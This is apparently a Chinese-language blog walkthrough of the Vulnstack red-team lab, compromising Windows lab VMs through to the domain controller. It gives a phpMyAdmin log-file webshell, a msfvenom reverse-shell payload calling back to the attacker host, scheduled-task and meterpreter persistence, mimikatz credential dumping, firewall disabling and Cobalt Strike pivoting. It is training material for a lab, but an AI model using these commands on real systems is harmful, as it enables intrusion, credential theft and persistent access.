Vulnstack 红队(一)

发布于 2022-03-13  136 次阅读


靶场信息

这个靶场是红日安全,红队第一个靶机,          密码:hongrisec@2019
由四台虚拟机组成win2k3/win7/win2008/kali
kali(vm8)攻击机                             192.168.21.128
win7(vm2/8)对外边界服务器       192.168.52.143/192.168.21.146   开启phpstudy即可
win2k3(vm2)域成员                       192.168.52.141
win2008(vm2)域靶机                    192.168.52.138

信息收集

  1. arp-scan -l或者nmap -sU --script nbstat.nse -p137 -T4 192.168.21.128/24
  2. nmap -T4 -f -sS -p- 192.168.21.146
    Not shown: 65523 closed ports
    PORT STATE SERVICE
    80/tcp open http
    135/tcp open msrpc
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    1027/tcp open IIS
    1028/tcp open unknown
    1030/tcp open iad1
    1031/tcp open iad2
    3306/tcp open mysql
    5357/tcp open wsdapi
    MAC Address: 00:0C:29:4F:8D:05 (VMware)
  3. 对80/135/445/3306端口进行测试
  4. dirsearch -u 192.168.21.140
    dirb  http://192.168.21.140
    gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -u http://192.168.21.140
    目录扫描获取
    [21:16:08] 200 - 2KB - /phpmyadmin/README
    [21:16:09] 200 - 32KB - /phpmyadmin/ChangeLog
    [21:16:10] 200 - 4KB - /phpMyAdmin/index.php

网站获取权限

phpmyadmin获权

  1. 登录http://192.168.21.146/phpmyadmin/默认密码root:root
  2. show variables like '%secure_file%';   查看是否有任意位置读写文件权限
    null  发现没权限into outfile
    show variables like '%general%'; #查看日志状
    SET GLOBAL general_log='on' #开启general
    set global general_log_file='C:/phpstudy/www/cmd.php'; #将路径改为
    SELECT "<?PHP @EVAL($_POST['zyx']);?>" #一句话木马
  3. 写马成功,蚁剑登录

权限维持/提升

  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.21.128 lpost=4444 -f exe -o 1.exe      #msf产生后门   蚁剑执行
  2. use exploit/multi/handler
    set payload
    set lhost
    run监听
  3. 获得权限shell      chcp  65001去除乱码
    schtasks /create /tn solrindex  "ma" /tr C:\phpstudy\www\1.exe /sc minute /mo 1(windows添加计划任务每分钟执行一次)
    getsystem
    ps
    migrate  520                 注入到一个system的进程里
    run persistence -X -i 50 -p 4444 -r 192.168.21.128

内网信息收集

  1. load kiwi
    creds_all     获取Administrator GOD hongrisec@2019
  2. 判断域信息
    whoami        #god/administrator查看当前权限
    hostname     #stu1显示主机名称
    net user        #Administrator Guest liukaifeng01查询用户列表
    net localgroup administrators   #Administrator;liukaifeng01获取本地管理员(通常包含域用户)信息
    systeminfo   #使用systeminfo查看系统详细信息
    shell tasklist   #查询进程列表,看看有没有杀毒软件进程

    进程名 软件
    360sd.exe 360 杀毒
    360tray.exe 360 实时保护
    ZhuDongFangYu.exe 360 主动防御
    KSafeTray.exe 金山卫士
    SafeDogUpdateCenter.exe 安全狗
    McAfee McShield.exe
    egui.exe NOD32
    AVP.exe 卡巴斯基
    avguard.exe 小红伞
    bdagent.exe BitDefender

    ipconfig            #dns为god.org域和dns一般为同一台主机
    net view            #查看域信息\\OWA\\ROOTTVI862UBEH\\STU1
    net config workstation     #查看当前登录域及登录用户信息GOD
    net view /domain  #查询域GOD
    net view /domain:GOD     #查询 GOD域内全部主机\\OWA\\ROOT-TVI862UBEH\\STU1

  3. cs上线
    SMB Beacon有两种使用方式:

    • 直接派生一个孩子,目的为了进一步盗取hash
    • 在已有的beacon上创建监听,用来作为跳板进行内网渗透

    这里我们使用第二种方式,创建SMB监听:

  4. 关闭防火墙shell netsh firewall show state
    shell netsh advfirewall set allprofiles state off
  5. 之后利用cs,网络扫描,进行上图操作,获取hash,迷糊桃,获取其他机器密码
  6. 密码192.168.52.138,成功获得域控权限,同理获得2003权限,渗透结束在这里插入图片描述
  7. 文章参考1.2.3.4.5.6
    cs使用1.2.3
子夜不哭
最后更新于 2022-03-13